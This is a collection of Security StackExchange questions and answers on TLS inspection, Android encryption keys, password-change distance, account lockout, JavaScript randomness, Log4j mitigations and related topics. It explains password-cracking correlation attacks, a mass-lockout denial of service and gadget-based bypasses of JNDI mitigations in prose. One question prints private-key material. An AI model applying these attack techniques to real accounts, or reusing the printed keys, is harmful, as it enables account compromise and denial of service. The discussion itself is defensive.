So let's say you have setup TLS between two different services. And you want to "prove" that out (for lack of better words. Basically just trying to witness the encrypted traffic in action). What's the best/easiest way to do that? Because those two services are communicating directly, can you really put yourself in the "middle" of the communication without doing major things (I guess modifying the routing tables of both services to send traffic through the observer?)? I suppose one way is to go on one service and just look at network traffic with tcpdump? Is that correct? And if so, is that the easiest way? Thanks in advance!
{ "source": [ "https://security.stackexchange.com/questions/256524", "https://security.stackexchange.com", "https://security.stackexchange.com/users/218786/" ] }
256,863
Why does an encryption key derived from your lock screen password give you "stronger protection" than a key chosen by the machine (or at any rate not derived from your lock screen password)? The context in which the above generic question arises for me is a Samsung mobile phone running on Android 11. So a more specific question (if that is preferable) would be: Why the above is the case for that particular device. In what follows, I will describe the context in more detail. If the question as stated above is already answerable, you may not have to read any further. Context As far as I can make out, this is what happens with an Android 11 Samsung phone. Encryption, in the sense of the machine's jumbling the data in storage, is always on (with no option to turn it off), but it may or may not give you any protection depending on which of the three cases below applies. Case 1. There is no lock screen password (where 'password' is a term of convenience that includes PIN, pattern etc. as well): You get no protection. The data may be encrypted, but anyone can get them decrypted without having to enter a password. Case 2. A lock screen password is set, but the "Strong protection" is off: You get protection. The machine chooses the encryption key. Case 3. A lock screen password is set and the "Strong protection" is on: You get more protection. The encryption key is derived from your lock screen password. Note. On the device, "Strong protection" is in Settings > Biometrics and security > Other security settings > "Strong protection." The blurb for it says, "Encrypt your phone using your secure lock type (pattern, PIN, or password)." If my understanding so far is wrong, please tell me so. The question may not even arise then, and I may have to delete it. Assuming then that the understanding is correct, the question is why derivation of the encryption key from something you chose gives you stronger protection? I would have thought the machine could do without your help (which may be 1234) to choose a strong encryption key. By the way, are there technical terms for encryption (in the sense of data jumbling whether or not it gives you any protection) vs. protection? Correction Case 3, as stated above, is wrong because of the way the term 'password' was defined (to include biometrics through 'etc.'). To get the benefit of an encryption key that is itself encrypted (with something you chose), you need to use the following: Case 3b. A lock screen pattern, PIN, or alphanumeric password is set and the "Strong protection" is on. For why this is so, see A. Hersean's answer. (I did not want anyone, having read only the question, to go away with the wrong information. I choose this manner of correcting the post, rather than striking out 'etc.', because the exclusion of biometrics is made more prominent and I don't want to appear to have got the thing right at the outset.)
In all cases, the encryption key is chosen at random by the device (your mobile phone). When biometrics are used to unlock the phone, they are checked by a mostly secure module (a TEE, in your case the Knox™ version of ARM TrustZone™). If the check says that the presented biometrics are close enough to those stored in the device, then the encryption key is read to decrypt the device. That means that the encryption key is stored as-is somewhere, and its access is only protected by an access control mechanism. Someone with physical access to the mobile phone could open it, read the key and decrypt the device, bypassing the access control. When a PIN, pattern, password or passphrase is used, the process can be made safer. Notice that a pattern is just a PIN with digits that cannot be repeated (instead of drawing it you could type it on a number pad). So a pattern is a weak PIN (because some combinations are impossible), and a PIN is a weak password (because only digits are allowed), which in turn is a weak passphrase. So, I'll simplify this answer by only referring to passphrases. When a passphrase is used, the encryption key is not stored directly in the device. It is first encrypted by a key encryption key (KEK). This KEK is derived from the passphrase and never stored anywhere. When a user tries to authenticate, their passphrase is derived into a KEK, and then the phone checks whether this KEK properly decrypts a test value. If the check fails, it means the passphrase is wrong. If the check passes, the newly derived KEK is used to decrypt the encryption key, which in turn can be used to decrypt the device. Thus, if someone gains physical access to the device, they cannot read the key. They can only try to guess the passphrase until they find the correct one. Because the derivation process takes some time (on purpose), trying every passphrase can be a very long process if the passphrase is long enough. When using biometrics, each reading differs, so no unique value can be used to derive a KEK. The encryption key must be stored somewhere in the device and be accessible without a KEK derived from data provided by the user. Earlier I simplified by writing that in this case the encryption key is stored as-is: for Android versions 7 to 9, it was in fact encrypted too, and the passphrase used to derive the KEK was "default_password". This was done to simplify the overall unlocking process by having only one way to do it. It offers no more protection than storing the encryption key directly, because the passphrase is public knowledge. In new versions of Android, file-based encryption is used, and there is no longer one single encryption key, but many keys for different files. However, the overall mechanism remains the same, just with more keys and thus more complexity. Explaining it would be too complex for the level of technical detail expected here. However, if you want more details, you can refer to the official documentation here and there, or refer to defalt's answers here and there. Just keep in mind that authenticating with biometrics can only deliver an authentication token; it cannot be used to derive a KEK. That's why Samsung says that patterns, PINs and passphrases are strong methods: in those cases attackers with physical access will have a harder time decrypting the device because they will have to guess the passphrase.
However, please note that trying every pattern and PIN is still very fast, so those two methods are not much more secure than using biometrics against this kind of attacker. For strong encryption, the user must use a strong passphrase. Side note, answering a comment: The delay to limit guessing only applies to someone trying every possibility using the graphical interface, maybe with a robot typing on the screen. For someone who opened the phone and copied its (mostly encrypted) data by accessing it directly, no such limitation applies. By the way, copying this data requires specialized skills and hardware. The time it takes to derive the KEK is due to the huge number of operations needed for the computation. However, someone who managed to copy the data can rent thousands of computers in the cloud to try all the combinations even faster, working in parallel with each computer trying a different set of combinations, and without delay limits enforced by the platform. Second side note: You also asked about technical terms for encryption (or "data jumbling") versus protection. "Data jumbling" is technically called obfuscation when it does not provide any substantial protection. Encryption is the technical term for when this jumbling depends only on a secret key, implying that everything else is considered public knowledge. Encryption is a mechanism to protect the confidentiality of data, but it does not ensure its authenticity (in some cases, an attacker could blindly and successfully alter the encrypted data without being detected). For this, other cryptographic mechanisms are needed, such as authentication codes or signatures. To summarize, there is no "encryption versus protection". Encryption is a mechanism offering one kind of protection. Like a lock. And like a lock, it does not protect against everything, but only against some attacks. Third side note, for clarification: In this answer, I try to explain in simple terms the fundamental difference between encryption on mobile devices (specifically Android) using only biometrics or using passphrases. It is a simplification, and shortcuts were made while explaining. Reality is more complex and other issues arise, such as "What happens when someone copies my fingerprint? I cannot change it, unlike a passphrase.".
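A minimal sketch of the KEK mechanism described above, using scrypt from the standard library for the derivation and AES-GCM from the third-party cryptography package for the wrapping. The parameters are purely illustrative; real Android implementations bind the derivation to keys held inside the TEE:

import os
import hashlib
from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESGCM

# The device generates a random data-encryption key (DEK) once.
dek = AESGCM.generate_key(bit_length=256)

def kek_from_passphrase(passphrase: str, salt: bytes) -> bytes:
    # Deliberately slow derivation; parameters are illustrative only.
    return hashlib.scrypt(passphrase.encode("utf-8"), salt=salt, n=2**14, r=8, p=1, dklen=32)

# Enrolment: wrap (encrypt) the DEK under a KEK derived from the passphrase.
salt, nonce = os.urandom(16), os.urandom(12)
kek = kek_from_passphrase("correct horse battery staple", salt)
wrapped_dek = AESGCM(kek).encrypt(nonce, dek, b"")

def unlock(passphrase: str):
    """Return the DEK if the passphrase-derived KEK unwraps it, otherwise None."""
    try:
        return AESGCM(kek_from_passphrase(passphrase, salt)).decrypt(nonce, wrapped_dek, b"")
    except InvalidTag:
        return None

print(unlock("1234") is None)                          # wrong passphrase: no key
print(unlock("correct horse battery staple") == dek)   # correct one: DEK recovered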
{ "source": [ "https://security.stackexchange.com/questions/256863", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269728/" ] }
256,886
After a password leak, is there a Levenshtein distance beyond which a newly derived password can be considered safe? I assume yes, given that if e.g. the old word was "password" and the new one is "drowssap", the distance is 8 and we have a "new" password (in this case a very lazy change that is surely not secure). I was wondering whether, in targeted attacks, a hacker could build up a dictionary for a single person using a list of passwords already found (e.g. from a compilation of breaches). I do understand that the Levenshtein distance is no good indicator for a safe password. However, I do wonder at what maximum distance a brute force of all possible variations of a given password stops being feasible, or the other way around: if I know the password was "password" (standing for any 8-character password) and I expect the person to use a similar password in the future - e.g. I have an aunt who I know would do this - what would I have to give her as a minimum distance so that I cannot easily calculate and guess her new password in an offline attack, assuming I was able to retrieve the password hash? I know the question is theoretical, but I aim to understand the whole thing from a bigger picture and whether, e.g., the Levenshtein distance can play any important role in password security. I am aware of all the good practices that are usually recommended.
Levenshtein distance as a proxy for password strength is extremely limited , for the reasons that schroeder has outlined. And the user experience will probably be poor. But the question is still academically interesting, and may be useful as a component for some use cases - so it still deserves a thorough answer. :D Generally, the minimum Levenshtein distance between a previous password and a new one should be the same size as the minimum length of a randomly-generated password that would resist brute force (adjusted to the threat model). But it's important to note that even this minimum is often inadequate. My answer is based on a few factors: the speed (attack difficulty) of the target hash type how much information about the previous password may be available to the attacker the methodology used to generate the initial password the usefulness of Levenshtein distance as a proxy for password change strength First, about speed. Worst case - a "fast" hash like MD5 - many different kinds of attacks become possible. This will allow us to put an upper bound on the minimum Levenshtein distance. Best case - a "slow" hash like bcrypt - attack speed slows significantly, but is not as slow as it used to be (more about that below). Second, about the user's previous password. We must assume that the attacker has the user's previous password. Not only is password reuse chronic, but nowadays, even if the attack is against slow hash, modern attack stacks include a highly efficient "per target" attack mode called a "correlation attack" (made possible by John the Ripper's "single" mode and later by hashcat's -a 9 mode) that leverages knowledge of previous passwords, even in bulk across a large leak. In correlation attacks, we assume that the attacker has access to the user's previous password (from a previous leak, from a different site due to password reuse, etc.). The attack takes the user's old password as a "base" and then applies a specific set of "mangling rules" (append $, capitalize the first letter, etc.) to each plaintext , but just for that user's hash . For larger batches of users and slower hashes, this dramatically increases the attack speed - because instead of trying the same candidate against every hash in a long list (as most traditional attacks do), correlation attacks apply those mangling rules just to that user's old password and then try the resulting candidate against just that user's hash . This is not just academic - real-world cracking now heavily depends on correlating user:password or email:password leaks and cracks against new targets. So we must assume that the attacker has the previous password. Third, about the password generation methodology. Worst case - the passwords are single human-generated words that are easily found in a password frequency list (like "123456"). If a human selects the next password, the likelihood that it will be similar to that is probably high, so even very low Levenshtein distances are probably relevant. Best case - the passwords are entirely randomly generated, both initially and later. In this case, Levenshtein distance isn't as relevant (or rather, measuring the Levenshtein distance between two randomly generated passwords is just a proxy for measuring the quality of their randomness). Fourth, about Levenshtein distance as a proxy for password strength. 
It is useful to think about this in terms of practical password entropy - how hard it is to attack in the real world, with full knowledge of how humans psychologically "chunk" password components. (This is also why Shannon entropy is notoriously bad at assessing the strength of non-randomly-generated passwords: it assumes brute force - that each letter in a word is a "chunk" that has to be independently attacked - instead of how a human remembers password components ("just add my kid's name").) Worst case - at the lowest entropy levels, as discussed above - if a user just increments a number by 1, or appends a different special character, etc., the Levenshtein distance will be extremely low. Best case - at the most complex - inserting a randomly selected character at a random position in the string is probably the highest practical entropy change (the hardest to predict) that can be made. For example, if we randomly inject 8 characters into a password, the delta in practical entropy is basically the same as if we had generated an 8-character random password. Given all of the above ... if we assume all worst cases (human-generated password, poor password-selection strategy, etc.), the answer should be clear: the amount of change in the password should itself be enough to withstand attack on its own - totally independent of the previous password (as if the first password was empty), and as if it was stored using a very fast hash like MD5. This reduces to how fast we can reasonably expect a randomly generated password to be exhausted for a given threat model, which is covered well elsewhere (but often hovers around 13-15 random characters). Unfortunately, as with many attempts to measure password strength, it's not that easy. This is because a password change with high Levenshtein distance can still have very low practical differential entropy. For example, if the user's first password is 'password' and their new password is 'passwordrumpelstiltskin', the Levenshtein distance of 15 sounds terrific. But the practical Levenshtein distance - of real-world changes to the initial string as humans apply them - is not 15, but rather one ("add a word"). In other words ... just like Shannon entropy, Levenshtein distance as a measure of password strength is really only useful in cases where the passwords are already randomly generated. And if you're doing that, you already have the information necessary to keep them strong, without trying to measure the difference between two of them. In even other words ... very low Levenshtein distances are an OK proxy for password change weakness, but high Levenshtein distances are a very poor proxy for password change strength. So my answer tries to find a balance between the two.
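To make that last point concrete, here is a minimal Python sketch (standard library only; the example strings are made up) that computes Levenshtein distance and shows how a large distance can still correspond to a single human "chunk" of change:

# Minimal sketch: Levenshtein distance vs. "practical" change size.
# Standard library only; the example passwords are made up.

def levenshtein(a, b):
    # Classic dynamic-programming edit distance (insert/delete/substitute = cost 1).
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        cur = [i]
        for j, cb in enumerate(b, start=1):
            cur.append(min(prev[j] + 1,                    # deletion
                           cur[j - 1] + 1,                 # insertion
                           prev[j - 1] + (ca != cb)))      # substitution
        prev = cur
    return prev[-1]

old = "password"
print(levenshtein(old, "password1"))                # 1  -> trivially guessable change
print(levenshtein(old, "passwordrumpelstiltskin"))  # 15 -> large distance, still one "add a word" rule

The raw distance of 15 looks impressive, but the second change is still only one mangling rule away from the old password.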
{ "source": [ "https://security.stackexchange.com/questions/256886", "https://security.stackexchange.com", "https://security.stackexchange.com/users/209428/" ] }
256,947
I found an information leakage vulnerability on a company website, and the leaked information includes all the usernames of the users. I also observed that the application uses a lockout mechanism that locks out users for 30 minutes after 5 failed attempts. So will this lockout be considered a vulnerability? I know account lockout by itself is not a vulnerability, but will the information leakage increase the severity of the problem or not?
I would consider this a serious vulnerability. This can lead to an attack where the attacker locks out every single user for 30 minutes. Unless the company has a VPN or other protection mechanism in place, it would be possible to download the entire user list, throw bogus passwords at all of the accounts, and lock the entire company out. An attacker can even keep this running in a loop and essentially deny access to all employees for a long period of time.
{ "source": [ "https://security.stackexchange.com/questions/256947", "https://security.stackexchange.com", "https://security.stackexchange.com/users/246544/" ] }
257,021
This question may be a little off-topic, but is Math.random the same as crypto.getRandomValues? (JavaScript) Here's an example: Math.random(); // 0.11918419514323941 self.crypto.getRandomValues(new Uint32Array(10))[0]; // 2798055700 (Using "self" for cross-site prevention) They don't output the same number or nearly the same length, but I'm wondering if "crypto.getRandomValues" is more secure than "Math.random"? A user told me (on this site) that I should use "crypto.getRandomValues" instead of "Math.random" for JavaScript security. All of this is for a JavaScript security project.
See MDN: Crypto.getRandomValues(), where it reads: The Crypto.getRandomValues() method lets you get cryptographically strong random values. (emphasis mine) In contrast, see MDN: Math.random(), where it reads: Note: Math.random() does not provide cryptographically secure random numbers. Do not use them for anything related to security. Use the Web Crypto API instead, and more precisely the window.crypto.getRandomValues() method. (emphasis mine)
{ "source": [ "https://security.stackexchange.com/questions/257021", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269810/" ] }
257,038
Around 4 months ago, someone learned my IP, and is threatening to DDoS attack me if I am not his slave. He was breaking the Discord TOS with all kinds of stuff in my DMs. I blocked him, but one of his friends told me to friend him back, or he will DDoS me. What should I do?
ISP's have ways of dealing with DDoS attacks targeting one or more IP addresses on their network. See How can ISPs handle DDoS attacks? for some interesting reading on this subject. What you are describing sounds more like online banter than a serious threat, and I would be surprised if your your adversary actually follows through with their threat (or even has the capability to do so). But, if he does attempt to mount a DDoS attack targeting the IP address that your ISP has assigned to you, and you are impacted by it - simply report it to your ISP and they can likely mitigate the problem using one of the methods in the above link.
{ "source": [ "https://security.stackexchange.com/questions/257038", "https://security.stackexchange.com", "https://security.stackexchange.com/users/269980/" ] }
257,071
We are serving static content over the internet, and have a business requirement that the data must be encrypted at rest. Currently it is stored in AWS S3, where it can be accessed by authorized clients over HTTP. We could proxy this through Cloudfront or Nginx to use TLS, but would only do so if it is necessary. The decryption key is retrieved by frontend client via a separate HTTPS request. Do we gain anything by serving the static content over HTTPS, given that it is already encrypted? It brings added costs, infrastructure, and latency, and I cannot think of the benefit.
You should serve this data over HTTPS regardless. As Gh0stFish pointed out, you can simply use an S3 bucket policy to require this. There are a couple reasons for this: Using plain HTTP makes it very easy to perform traffic analysis. If I know that encrypted blob 123 is sensitive because I've already seen it or it comes from a site with sensitive information, I can see who else has downloaded this blob and associate the sensitive information with them. Unlike static encryption, TLS is usually configured to provide perfect forward secrecy. That is, once the connection has been torn down, the data cannot be recovered. HTTPS is now standard, and not using it, even for encrypted data, is often seen as irresponsible. If your customers inquire whether their data is served over HTTPS, you can simply say, "Yes," instead of having to explain why you don't and why it's still secure. HTTP/2, which can provide significant performance improvements, is only available over HTTPS in web browsers. I don't believe S3 currently supports HTTP/2, but if it does in the future, you'll need to be using HTTPS. HTTPS is fast. Most x86-64 systems will be able to handle encrypted data at speeds over 6 GiB/s on a single core, which is faster than a 10 Gb/s network card. Encryption is no longer the bottleneck that it once was, so there's little reason not to use it. HTTPS provides protection against tampering with the request. For example, if I as the attacker just saw client A request file 123 and I now see client B request file 456, I could substitute the response given to client A if the key is not unique. If I know file 123 is for a publicly available sex education site and client B is a large corporation, I could substitute material which, while not pornographic, might not be appropriate for a workplace.
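As a rough sketch of the bucket policy mentioned at the top of this answer (the bucket name is hypothetical, and boto3 is just one way to apply it; the key piece is the aws:SecureTransport condition):

# Sketch: deny non-TLS access to an S3 bucket. The bucket name is hypothetical.
import json
import boto3

policy = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "DenyInsecureTransport",
        "Effect": "Deny",
        "Principal": "*",
        "Action": "s3:*",
        "Resource": [
            "arn:aws:s3:::example-static-content",
            "arn:aws:s3:::example-static-content/*",
        ],
        # Requests made over plain HTTP have aws:SecureTransport = false and are denied.
        "Condition": {"Bool": {"aws:SecureTransport": "false"}},
    }],
}

s3 = boto3.client("s3")
s3.put_bucket_policy(Bucket="example-static-content", Policy=json.dumps(policy))

With this in place, any plain-HTTP request to the bucket is refused before the object is ever served.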
{ "source": [ "https://security.stackexchange.com/questions/257071", "https://security.stackexchange.com", "https://security.stackexchange.com/users/270038/" ] }
257,080
Can I please get some help in understanding the representation/connection between the issuer key structure, such as the one here: { "kty": "EC", "d": "6RDoFJrbnJ9WG0Y1CVXN0EnxbuQIgRMQfzFVKogbO6c", "use": "sig", "crv": "P-256", "x": "eIA4ZrdR7IOzYRqLER9_JIkfQCAeo1QI3VCEB7KaIow", "y": "WKPa365UL5KRw6OJJsZ3R_qFGQXCHg6eJe5Nzw526uQ", "alg": "ES256" } and the actual elliptic curve Curve25519, which is supposed to satisfy the equation: y^2 = x^3+486662x^2+x. Are the x and y above related to the x and y which I see in this equation? If so, in what way exactly? And how is the private key "d" connected to all this? How are the x and y on the curve related to "d"? And the kid (key ID), which is not even shown above? Why are they all 43 bytes long? And what format are the above represented in? Also: I notice the QR code is 1776 bytes long: shc:/56762909510950603511292437..............656 which gets translated to a "numeric" code of length 888: eyJ7aXAiOiKERUYiLREhbGciOiJFUzI1Ni.......xpW (How does one convert it as such?) which in turn decodes to: {"zip":"DEF","alg":"ES256","kid":"Nlewb7pUrU_f0tghYKc88uXM9U8en1gBu88rlufPUj7"} And the private key in X.509 format looks like this: -----BEGIN PRIVATE KEY----- MEECAQAwEwYHKoZIzj0CAQYIKoZIzj0DAQcEJzAlAgEBBCDpEOgUmtucn1YbRjUJ Vc3QSfFu5AiBExB/MVUqiBs7pw== -----END PRIVATE KEY----- Why 92 bytes? They are all related... just trying to understand how they are converted to one another, and particularly how they relate to the equation of the curve. Thanks, Steve
{ "source": [ "https://security.stackexchange.com/questions/257080", "https://security.stackexchange.com", "https://security.stackexchange.com/users/270057/" ] }
257,082
E.g. if I were to register for a new website and am prompted for a password, my browser might generate a complicated password that looks like uv^2<YGYy}#Vj}=f which might be impossible to crack but also impossible to remember. Why such passwords instead of, say, AllThatIsGoldDoesNotGlitterNotAllWhoWanderAreLost which uses a smaller set of characters but is much longer? The sheer length (49 characters) should also make it impossible to crack, but because it's a recognizable phrase it's also much easier to remember.
You say you want the browser to suggest a recognizable (which I take to mean coherent) phrase. Have you thought about how a browser would implement that? The browser cannot keep a long list of such phrases, because for the list to be even remotely secure, it would have to be ridiculously large. If the browser tries to use some sort of AI to create a coherent phrase on the spot, it would have to ensure that the algorithm does not have and does not develop any sort of bias. I'm not sure how hard of a task that is, but it's probably not worth the effort. Pulling the phrase from the internet would also not be acceptable to many people, for obvious reasons. A more practical alternative would be to generate xkcd-style passphrases. However, these will probably not be as memorable as you might want, especially when you have dozens of them, for all the different sites you have accounts on. The only viable solution in the long run is to rely on password managers. And to a password manager, a complex password is a non-issue. So that's what the browsers do. Suggest complex passwords that have enough entropy to resist all sorts of password guessing attacks. And then save them in the browser's built-in password manager.
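For illustration, a minimal sketch of how such an xkcd-style generator could work; the wordlist file is a placeholder for any large list (for example a diceware list), and the strength depends entirely on the list size and the number of words:

# Sketch: xkcd-style passphrase generation with a CSPRNG.
# "wordlist.txt" is a placeholder for any large word list (e.g. ~7776 diceware words).
import math
import secrets

with open("wordlist.txt") as f:
    words = [w.strip() for w in f if w.strip()]

n_words = 5
passphrase = " ".join(secrets.choice(words) for _ in range(n_words))
entropy_bits = n_words * math.log2(len(words))

print(passphrase)
print(f"~{entropy_bits:.0f} bits of entropy")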
{ "source": [ "https://security.stackexchange.com/questions/257082", "https://security.stackexchange.com", "https://security.stackexchange.com/users/251562/" ] }
257,135
Suppose I am using a web browser to look at example.com. Now, from the same web browser tab, I enter example.org in the address bar and go to that completely different website operated by another entity. Does example.org know that the previous website I used was example.com? I understand that example.org can look at the HTTP Referer header to know that I came from example.com if I clicked on a link on example.com to reach example.org. What if I manually entered the address in the address bar instead? Will example.org know the previous website I came from?
Do websites know which previous website I visited? There is no direct cross-site access to the browser's history. But there are ways to "probe" the history and thus detect previous access to a specific page or site. Techniques for such cross-site detection of the user's browser history are known under the term "history sniffing". Apart from that, use of cross-site trackers and advertisement networks (Google Analytics and others) offers cross-site profiling of a user based on the user's history. History sniffing basically works by observing side effects (usually timing differences) when including well-known resources from other sites. This way one can detect if the user has visited a site or a specific page before, because the timing to load the resource might slightly differ if the resource was loaded from the browser cache (i.e. page already visited), or the server processing might differ depending on whether the browser sent a cookie (i.e. site visited or not). Similar differences could be observed by including a resource from an HSTS-enabled site with plain HTTP and thus checking whether the browser already knew the site was HSTS-enabled and therefore accessed it directly over HTTPS. History sniffing has gotten harder in recent years, with at least some browsers focusing more on preserving privacy and limiting cross-site interactions with history-associated stored data (cache, cookies, ...), even at the cost of some performance loss (i.e. not loading data from cache cross-site). But it is still possible. For some links about older techniques see Browser cache information disclosure or Workarounds for :visited CSS History reconnaissance on this site. Some newer papers in this regard are Cookies from the Past: Timing Server-side Request Processing Code for History Sniffing from 2020 and Browser history re:visited from 2018.
{ "source": [ "https://security.stackexchange.com/questions/257135", "https://security.stackexchange.com", "https://security.stackexchange.com/users/132550/" ] }
257,143
The data on my USB thumb drive is no longer accessible using an ordinary consumer computer (cf. https://superuser.com/questions/1687720 ). I wish to make sure that someone cannot extract data from it without having to take extraordinary measures (e.g. spending €millions). How can I damage the drive's data beyond (easy) recovery while maintaining the way the drive looks, i.e., not damaging the hull or otherwise destroying it physically on the macroscopic level? That is, no hammers, no nails, and no drills. Some reports on the web said that microwaving for 5 minutes didn't help and neither did simple immersion in water. How about boiling water? Perhaps in a pressure cooker? Or the freezer? I don't have 9V batteries at my disposal. Any further ideas using typical household or office items?
{ "source": [ "https://security.stackexchange.com/questions/257143", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
257,150
As the image below shows, when you try to restore an existing wallet from a seed (a sequence of 12 words), the program offers some autocomplete suggestions. Though I'm sure the risk is purely theoretical – in the sense that the number of permutations is high enough to make any attempt at guessing practically impossible – isn't it, still, a theoretical security risk? What exactly is the benefit of offering autocomplete for a seed word sequence, since it's predicated not on memorization but on safekeeping (ideally on a piece of paper)? Just to make it absolutely clear, the image was taken from GitHub, and (I assume!) it only serves as an example and does not reflect an actual wallet.
{ "source": [ "https://security.stackexchange.com/questions/257150", "https://security.stackexchange.com", "https://security.stackexchange.com/users/-1/" ] }
257,611
I've seen some similar questions but maybe not exactly what I'm asking. Also I can't say that I've followed all the technical jargon in previous posts and am really after more of an intuitive understanding. So let's say I'm allowed ten characters. The usual requirement is to use numbers, symbols, etc. But why is #^Afx375Zq more secure than aaaaaaaaaa ? The hacker doesn't know that I've repeated a character ten times, so doesn't he still have to go through the testing of all possibilities or are things like repeated characters tested first? Similarly, suppose I use a 21-character passphrase such as I like Beatles' songs. Now someone might say that that's a common type of statement but again the hacker doesn't know that I'm using a passphrase instead of DD63@*()ZZZ125++dkeic so why is it (I assume) less secure? Are passphrases tested first?
If you were to generate a totally random password that is 10 characters long and can contain lower and upper case letters, numbers and common symbols, then you are equally likely to come up with #^Afx375Zq as with aaaaaaaaaa. So from that point of view you're right that the passwords are equally secure. However, most passwords are not generated randomly. They are chosen by humans, and humans don't pick a completely random series of characters. They choose something that they will be able to remember, and clearly the second password is much easier to remember than the first. Therefore, if you take a large enough database of user accounts, you are likely to find that far more of them have chosen your second password than your first. As an attacker I can use that knowledge, so I'll test easy-to-remember passwords first.
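A quick back-of-the-envelope calculation makes the point: the raw keyspace is identical for both strings, but an attacker who orders guesses by human likelihood will hit one of them almost immediately. The "likely" list below is made up for illustration:

# Sketch: identical keyspace, very different position in a human-likelihood-ordered guess list.
import math

alphabet_size = 95                 # roughly the printable ASCII characters
length = 10
keyspace = alphabet_size ** length
print(f"keyspace: {keyspace:.3e} (~{math.log2(keyspace):.1f} bits)")

# A made-up fragment of a likelihood-ordered guess list an attacker might use first:
likely_first = ["123456", "password", "aaaaaaaaaa", "qwertyuiop"]
print("aaaaaaaaaa" in likely_first)   # True  -> guessed within the first few attempts
print("#^Afx375Zq" in likely_first)   # False -> only reachable by exhausting the keyspace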
{ "source": [ "https://security.stackexchange.com/questions/257611", "https://security.stackexchange.com", "https://security.stackexchange.com/users/247762/" ] }
257,795
Assuming a product shelf life of 30 years, for a product released now in 2021, what is the recommendation/suggestion for hashing or encryption algorithms to use in the product? That is, should I directly make use of the superior algorithms (SHA-512 for hashing, AES-256 for encryption), or should this be driven by SAL (Security Assurance Level) or other factors? Also, are there any recommendations from NIST for choosing these based on the product's shelf life?
Using SHA-512 and AES-256 as you suggest is generally not wrong. But this may change in the future. In detail: it depends on the use case. Do you need a block cipher or a stream cipher? Do you want to hash passwords or something else? There are multiple possible algorithms available. You need to use appropriate functions, not outdated or broken ones. But maybe even more important: every algorithm can be broken in the future. So it is very important that your product is updatable and can introduce new hash/encryption algorithms to replace the old ones.
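One minimal way to keep that updatability is to tag every stored digest with an algorithm identifier, so old values can be recognized and migrated later. A sketch, with made-up version labels and storage format:

# Sketch: version-tagged hashing so the algorithm can be replaced over the
# product's lifetime. The "v1"/"v2" labels and the storage format are made up.
import hashlib

HASHERS = {
    "v1": hashlib.sha256,   # what ships today
    "v2": hashlib.sha512,   # a later upgrade path
}
CURRENT = "v2"

def digest(data, version=CURRENT):
    return f"{version}${HASHERS[version](data).hexdigest()}"

def verify(data, stored):
    version, _ = stored.split("$", 1)
    return digest(data, version) == stored

stored = digest(b"some firmware blob")
print(verify(b"some firmware blob", stored))   # True, and older "v1" values still verify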
{ "source": [ "https://security.stackexchange.com/questions/257795", "https://security.stackexchange.com", "https://security.stackexchange.com/users/247172/" ] }
257,834
Our project is to apply digital signatures to PDFs, so each user should have their own key pair and a certificate. To keep the keys secure, we plan to purchase an HSM, but from what I understand an HSM can only store a limited number of keys. So, to my question: how should we handle the situation where we have hundreds or thousands of users who need to store their own keys and certificates? One idea that I have: generate a master key in the HSM, generate user keys outside of the HSM, encrypt each user key with the master key, and store the encrypted user keys. But I'm not sure if this is the best practice. Thank you.
{ "source": [ "https://security.stackexchange.com/questions/257834", "https://security.stackexchange.com", "https://security.stackexchange.com/users/271226/" ] }
257,873
Log4j has been ported to other languages, such as log4perl, log4php, log4net, and log4r. Are these ports vulnerable to CVE-2021-44228 as well? I believe that they aren't because the vulnerability uses JNDI (Java Naming and Directory Interface), which I doubt would be relevant in other languages.
That CVE does not impact the ports, only Log4j, since it requires the use of Java interfaces (and some JVM versions prevent the vulnerability from being exploited). It may be that the ports have similar vulnerabilities, but they would likely be of a substantially different nature such that we would issue a different CVE for them to help distinguish the vulnerabilities, patching, and remediation steps.
{ "source": [ "https://security.stackexchange.com/questions/257873", "https://security.stackexchange.com", "https://security.stackexchange.com/users/129883/" ] }
257,943
According to the notes for CVE-2021-44228 at mitre.org: Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html ) protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false". Therefore, assuming the defaults are in place, are my web-facing applications protected from the threat this vulnerability introduces if the application is running on JRE/JDK 8u121 or newer?
No, you really need to update log4j. Here is an excerpt from LunaSec's announcement: According to this blog post (see translation), JDK versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not affected by the LDAP attack vector. In these versions com.sun.jndi.ldap.object.trustURLCodebase is set to false, meaning JNDI cannot load remote code using LDAP. However, there are other attack vectors targeting this vulnerability which can result in RCE. An attacker could still leverage existing code on the server to execute a payload. An attack targeting the class org.apache.naming.factory.BeanFactory, present on Apache Tomcat servers, is discussed in this blog post. It looks like the change in 8u121 helped, but it does not entirely prevent an RCE. The recommendation is to upgrade log4j and not trust a Java update to fix it.
{ "source": [ "https://security.stackexchange.com/questions/257943", "https://security.stackexchange.com", "https://security.stackexchange.com/users/219895/" ] }
258,266
Proper security algorithms demand true random numbers. For instance, secret keys & initialization vectors should always be truly random. However, generating numbers using Java's Random library, or C's srand() initialization followed by rand(), can only produce pseudorandom numbers. From what I understand, since functions like srand() gather the seed from some source such as the system time, and the 24-hour clock is cyclical, it is not truly random. Please correct me if this assumption is flawed. Also, an example of a truly random number would be if we use a seed from, let's say, an audio file, pick a pseudorandom place in the file and then take the audio frequency at that location. Since only the location was pseudorandom but the frequency at that location was not, the value is truly random. Please correct me if this assumption is flawed. Finally, apologies for compounding the question further: exactly how vulnerable would it really leave systems if pseudorandom values are used? I have learned that AES 128 is actually enough to secure systems (Is 128-bit security still considered strong in 2020, within the context of both ECC Asym & Sym ciphers?). For military standards, 192 & 256 were adopted (Why most people use 256 bit encryption instead of 128 bit?). Is using true random values also akin to following such baseless standards, or is it actually crucial?
